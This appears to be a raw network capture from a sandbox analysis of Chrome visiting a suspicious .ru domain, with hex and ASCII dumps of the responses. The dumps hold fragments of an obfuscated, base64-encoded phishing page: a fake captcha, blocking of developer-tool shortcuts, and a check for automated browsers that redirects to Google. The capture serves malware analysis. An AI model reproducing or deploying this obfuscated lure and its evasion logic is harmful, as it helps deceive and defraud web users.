                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYJrhWtEirCCSpJwuCNZ3OreEMWOWeW49Xzlnj6JpTUzaLOLFk%2B1ffX0a77QRgSyB%2F5mbftYEBSyyvO2knb38M239YHOoAdq277Mlx4ZnSzDQjih8jCeMTvlhTQM%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=5033&min_rtt=5002&rtt_var=1464&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1596&delivery_rate=550338&cwnd=251&unsent_bytes=0&cid=58a0f143ad6f966f&ts=329&x=0"
                      Set-Cookie: XSRF-TOKEN=eyJpdiI6Ild1dmgwKzEzNUpuaGZhMFVxNHRjVEE9PSIsInZhbHVlIjoiRHp5ejZHZVk4SldFZmR2cWJBTnVwbmcxTzU5Y1h5SHA3c3NnUVg4MTdjbklZT3BaMmdjazhXSjZtVUpOU1gzSVpTZ0xvRWRSMzhnc3M3RStiYXFqcVhrY2VZY3dUelhVTTQ3UWVLRTlLQ3JzeHBRQUVmeU5OZzRxc1pTaHJoMFQiLCJtYWMiOiI3MTRiOTU1N2Y2MWRjNjU3MjJhMDIxMWE1ZjIzYzA1NTczMjc0NDgwM2JjMmY2NTU1NDBkMjRjYTFjNzAwODllIiwidGFnIjoiIn0%3D; expires=Tue, 14-Jan-2025 15:36:46 GMT; Max-Age=7200; path=/; secure; samesite=none
                      2025-01-14 13:36:46 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 6c 6c 5a 6d 74 73 56 30 39 7a 53 32 68 56 59 6a 64 4d 5a 47 56 51 57 47 4a 50 54 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 58 59 31 55 57 70 6b 63 32 78 76 54 46 68 54 53 47 46 78 57 6d 52 4c 63 45 5a 4f 55 69 39 4e 55 30 6c 55 59 33 46 43 5a 57 64 6d 63 69 39 4c 5a 47 31 34 4f 55 51 72 56 6e 45 78 53 46 70 69 62 6a 42 4b 56 31 52 4f 4e 46 68 6b 56 32 5a 31 56 47 67 77 55 57 70 56 5a 48 51 33 54 7a 49 79 52 7a 68 50 5a 48 4a 61 4e 44 59 78 59 7a 68 6d 4c 33 46 54 55 6b 51 7a 55 33 46 4d 4e 45 74 70 63 31 46 75 63 58 6c 47 57 54 4a 53 61 6d 70 6e 63 47 6c 4b 51 6d 78 46 61 48 46 54 61 58 46 74 55 32 35 42 4d 6c 4e 30 53 55 6f
                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImllZmtsV09zS2hVYjdMZGVQWGJPT3c9PSIsInZhbHVlIjoibXY1UWpkc2xvTFhTSGFxWmRLcEZOUi9NU0lUY3FCZWdmci9LZG14OUQrVnExSFpibjBKV1RONFhkV2Z1VGgwUWpVZHQ3TzIyRzhPZHJaNDYxYzhmL3FTUkQzU3FMNEtpc1FucXlGWTJSampncGlKQmxFaHFTaXFtU25BMlN0SUo
                      2025-01-14 13:36:46 UTC1369INData Raw: 38 66 35 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 47 59 56 4d 75 64 48 4a 70 62 47 6c 32 59 58 4a 75 62 33 49 75 63 6e 55 76 54 6d 6c 4c 56 54 4e 4a 55 32 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46
                      Data Ascii: 8f5<script>if(atob("aHR0cHM6Ly9GYVMudHJpbGl2YXJub3IucnUvTmlLVTNJU2cv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF
                      2025-01-14 13:36:46 UTC931INData Raw: 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 41 6a 4d 44 41 77 4d 44 41 77 4f 47 45 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c
                      Data Ascii: nRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxl
                      2025-01-14 13:36:46 UTC1369INData Raw: 64 63 63 0d 0a 52 70 63 33 42 73 59 58 6b 36 49 47 5a 73 5a 58 67 37 44 51 6f 67 49 43 41 67 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 6a 64 58 4a 7a 62 33 49 36 49 48 42 76 61 57 35 30 5a 58 49 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f 5a 57 4e 72 62 57 46 79 61 79 42 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 49 77 63 48 67 37 44 51 6f 67 49 43 41 67 61 47 56 70 5a 32 68 30 4f 69 41 79 4d 48 42 34 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 6a 6f 67 4d 6e 42 34 49 48 4e 76 62 47 6c 6b 49 43 4e 6b 4d 32 51 7a 5a 44 4d 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 4a 68 5a 47 6c 31 63 7a 6f 67 4d 33 42 34 4f 77 30 4b 49 43 41 67
                      Data Ascii: dccRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAg
                      2025-01-14 13:36:46 UTC1369INData Raw: 42 77 62 33 4e 70 64 47 6c 76 62 6a 70 79 5a 57 78 68 64 47 6c 32 5a 54 73 4e 43 69 41 76 4b 6e 4a 70 5a 32 68 30 4f 69 41 78 4f 44 4a 77 65 44 73 71 4c 77 30 4b 49 48 64 70 5a 48 52 6f 4f 6a 4d 32 63 48 67 37 44 51 6f 67 59 6d 39 34 4c 58 4e 70 65 6d 6c 75 5a 7a 70 69 62 33 4a 6b 5a 58 49 74 59 6d 39 34 4f 77 30 4b 49 47 46 75 61 57 31 68 64 47 6c 76 62 6a 6f 67 63 33 42 70 62 69 42 73 61 57 35 6c 59 58 49 67 4d 58 4d 67 61 57 35 6d 61 57 35 70 64 47 55 37 44 51 6f 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 62 6d 39 75 5a 54 73 4e 43 6e 30 4e 43 67 30 4b 51 47 74 6c 65 57 5a 79 59 57 31 6c 63 79 42 7a 63 47 6c 75 49 48 73 4e 43 69 41 67 49 43 41 77 4a 53 42 37 49 48 52 79 59 57 35 7a 5a 6d 39 79 62 54 6f 67 63 6d 39 30 59 58 52 6c 4b 44 42 6b 5a 57 63 70 4f
                      Data Ascii: Bwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpO
                      2025-01-14 13:36:46 UTC801INData Raw: 68 62 57 6c 73 65 54 6f 67 63 33 6c 7a 64 47 56 74 4c 58 56 70 4f 77 30 4b 59 32 39 73 62 33 49 36 49 48 4a 6c 5a 44 73 4e 43 6d 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 69 42 69 62 32 78 6b 4f 77 30 4b 66 51 30 4b 49 32 4e 68 63 48 52 6a 61 47 46 44 59 57 35 32 59 58 4d 67 65 77 30 4b 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 70 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 41 78 4d 48 42 34 4f 77 30 4b 66 51 30 4b 5a 6d 39 79 62 53 42 37 44 51 70 74 59 58 4a 6e 61 57 34 36 49 44 41 37 44 51 70 39 44 51 6f 38 4c 33 4e 30 65 57 78 6c 50 67 30 4b 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 6d 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d 56 79 49 48 78 38 49 48 64 70 62 6d 52 76 64 79 35 6a 59 57
                      Data Ascii: hbWlseTogc3lzdGVtLXVpOw0KY29sb3I6IHJlZDsNCmZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KI2NhcHRjaGFDYW52YXMgew0Kd2lkdGg6IDEwMCU7DQptYXJnaW4tYm90dG9tOiAxMHB4Ow0KfQ0KZm9ybSB7DQptYXJnaW46IDA7DQp9DQo8L3N0eWxlPg0KPHNjcmlwdD4NCmlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYW
                      2025-01-14 13:36:46 UTC1369INData Raw: 63 61 64 0d 0a 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 6a 63 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 63 30 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72
                      Data Ascii: cadAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5r
                      2025-01-14 13:36:46 UTC1369INData Raw: 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 46 6a 59 32 39 31 62 6e 52 7a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 76 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4c 43 41 78 4d 44 41 70 4f 77 30 4b 66 53 6b 6f 4b 54 73 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a 57 46 6b 50 67 30 4b 50 47 4a 76 5a 48 6b 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 49 6a 34 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61
                      Data Ascii: AgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2FjY291bnRzLmdvb2dsZS5jb20vJyk7DQogICAgICAgIH0NCiAgICB9LCAxMDApOw0KfSkoKTsNCjwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kLWNvbnRhaW5lciI+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kIj48L2Rpdj4NCjxka
                      2025-01-14 13:36:46 UTC514INData Raw: 4e 56 57 6c 4a 54 56 56 70 53 56 42 35 4f 45 4a 6d 63 54 5a 43 59 31 46 6f 53 48 5a 31 4f 45 4a 4e 55 57 64 49 5a 6d 30 33 51 6b 31 52 5a 30 6c 50 64 45 56 4f 5a 44 6c 42 54 55 39 30 51 30 35 6c 63 45 52 4f 5a 57 52 4a 54 55 31 52 61 6b 67 72 63 45 52 4f 5a 57 68 44 54 69 73 78 52 45 35 6c 64 45 52 4f 54 55 31 72 53 55 31 52 61 55 6c 51 61 54 64 43 59 30 31 70 53 48 5a 74 4e 30 4a 50 61 45 4e 4f 54 33 42 44 54 6d 56 77 51 30 35 50 61 45 56 4f 54 32 52 42 54 30 39 73 51 30 35 6c 4f 55 46 4e 54 33 42 45 54 53 74 6f 52 45 35 6b 4f 55 46 52 52 55 64 47 4f 55 56 4c 52 6a 6c 45 54 32 39 56 4d 45 74 46 4f 48 70 54 62 31 55 77 52 30 51 34 65 6b 39 74 56 56 56 4c 52 6a 68 71 54 33 42 56 4d 45 4e 42 4e 33 70 44 62 6c 56 46 52 30 59 35 52 46 4e 77 56 57 74 4c 52 44
                      Data Ascii: NVWlJTVVpSVB5OEJmcTZCY1FoSHZ1OEJNUWdIZm03Qk1RZ0lPdEVOZDlBTU90Q05lcEROZWRJTU1RakgrcEROZWhDTisxRE5ldEROTU1rSU1RaUlQaTdCY01pSHZtN0JPaENOT3BDTmVwQ05PaEVOT2RBT09sQ05lOUFNT3BETStoRE5kOUFRRUdGOUVLRjlET29VMEtFOHpTb1UwR0Q4ek9tVVVLRjhqT3BVMENBN3pDblVFR0Y5RFNwVWtLRD
                      2025-01-14 13:36:46 UTC1369INData Raw: 37 64 63 0d 0a 77 4c 32 5a 55 4e 43 74 51 53 55 59 76 64 6d 4e 48 4c 33 5a 6d 4d 6a 6c 6d 54 55 74 44 64 6c 6c 4a 51 58 64 71 65 45 4e 51 4d 33 6c 44 4c 7a 63 7a 51 6e 59 33 4d 45 4a 33 59 30 70 44 64 32 4e 50 4c 33 5a 6a 51 30 52 6d 52 55 70 44 55 55 56 50 4c 32 59 7a 4e 69 73 76 61 30 70 43 5a 31 68 34 51 57 64 32 4f 43 74 42 62 6a 52 45 55 45 6c 50 4f 57 64 5a 54 69 39 51 62 30 4a 45 55 46 56 4d 4b 33 5a 5a 54 6a 67 33 53 32 52 72 51 55 46 42 51 55 4a 5a 61 33 52 49 55 6b 68 76 4e 44 46 5a 56 6e 46 42 51 55 46 42 51 6a 4e 53 53 6c 52 56 56 55 67 32 51 58 64 4e 52 56 4a 42 56 54 6c 43 62 48 56 75 55 55 46 42 51 32 78 73 53 6c 4a 46 52 6c 56 6c 54 6e 4a 30 4d 6d 64 74 52 46 68 47 56 56 4a 6f 64 55 64 6c 51 31 4e 5a 55 55 56 77 62 47 64 34 53 30 4a 34 51
                      Data Ascii: 7dcwL2ZUNCtQSUYvdmNHL3ZmMjlmTUtDdllJQXdqeENQM3lDLzczQnY3MEJ3Y0pDd2NPL3ZjQ0RmRUpDUUVPL2YzNisva0pCZ1h4QWd2OCtBbjREUElPOWdZTi9Qb0JEUFVMK3ZZTjg3S2RrQUFBQUJZa3RIUkhvNDFZVnFBQUFBQjNSSlRVVUg2QXdNRVJBVTlCbHVuUUFBQ2xsSlJFRlVlTnJ0MmdtRFhGVVJodUdlQ1NZUUVwbGd4S0J4Q


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449749151.101.2.1374432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:47 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                      Host: code.jquery.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                      sec-ch-ua-platform: "Windows"
                      Accept: */*
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: script
                      Referer: https://ism.trilivarnor.ru/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 13:36:47 UTC613INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 89501
                      Server: nginx
                      Content-Type: application/javascript; charset=utf-8
                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                      ETag: "28feccc0-15d9d"
                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                      Access-Control-Allow-Origin: *
                      Cross-Origin-Resource-Policy: cross-origin
                      Via: 1.1 varnish, 1.1 varnish
                      Accept-Ranges: bytes
                      Age: 2346333
                      Date: Tue, 14 Jan 2025 13:36:47 GMT
                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740056-EWR
                      X-Cache: HIT, HIT
                      X-Cache-Hits: 2774, 0
                      X-Timer: S1736861808.650722,VS0,VE1
                      Vary: Accept-Encoding
                      2025-01-14 13:36:47 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                      2025-01-14 13:36:47 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                      Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                      2025-01-14 13:36:47 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                      Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                      2025-01-14 13:36:47 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                      Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                      2025-01-14 13:36:47 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                      Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                      2025-01-14 13:36:47 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                      Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
